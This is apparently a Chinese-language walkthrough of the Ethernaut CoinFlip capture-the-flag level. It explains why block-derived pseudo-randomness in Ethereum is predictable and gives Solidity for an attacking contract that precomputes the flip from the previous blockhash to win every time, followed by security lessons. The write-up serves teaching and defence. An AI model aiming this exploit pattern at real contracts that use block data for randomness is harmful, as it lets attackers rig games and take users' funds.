以太坊如何产生“随机性”
以太坊区块链上没有真正的随机性,只有被认为“足够好”的随机生成器。
开发人员目前通过在以太坊中的散列独特性或难以篡改性的变量创建伪随机性。此类变量的示例包括transaction timestamp, sender address, block height 。
以太坊提供两种主要的加密散列函数,即SHA-3和较新的KECCAK256,它们对这些输入变量的串联字符串进行散列。
最终生成的哈希被转换为一个大整数,然后由n修改。 这是为了得到一组离散的概率整数,在0到n的期望范围内。
请注意,在我们的Ethernaut练习中,n = 2代表硬币翻转的两面。
这种在智能合约中导出伪随机性的方法很容容易受到攻击。如果知道输入的黑客可以结此猜出“随机”结果。
这就是解决CoinFlip级别的关键。 在这里,确定硬币翻转的输入变量对于您来说是公开的。
详情演练
我们来创建一个恶意智能合约,检查硬币翻转的结果。
只有当你正确猜到了结果时,你才能调用真实合约的翻转(bool _guess)函数。
1、在Remix IDE中,创建一个与CoinFlip.sol相关的恶意合同:
contract hackCoinFlip {
CoinFlip public originalContract = CoinFlip(
“your instance address”);
uint256 FACTOR = 578960446186580977117854925043439539266349923
32820282019728792003956564819968;
function hackFlip(bool _guess) public {
//TODO
}
}
2、实现hackFlip()函数,使用与原始智能合约相同的逻辑和输入变量来预测翻转结果。 既然你知道blockhash和block.number,那么你就能准确预测正确的_guess。
function hackFlip(bool _guess) public {
// pre-deteremine the flip outcome
uint256 blockValue = uint256(block.blockhash(block.number-1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
// If I guessed correctly, submit my guess
if (side == _guess) {
originalContract.flip(_guess);
} else {
// If I guess incorrectly, submit the opposite
originalContract.flip(!_guess);
}
}
3、调用你的hackFlip()函数10次。当您做出正确的猜测时,原始智能合约的consecutiveWins计数器应该逐步增加。
关键安全要点
1. 没有真的随机性。
2. 在计算智能合约中的“随机性”时(或者甚至从现有的随机数库继承)时要格外注意。 如果您使用随机性来确定比赛获胜者,请记住,对手可以轻松猜出随机结果并破解您的游戏!
评论
查看更多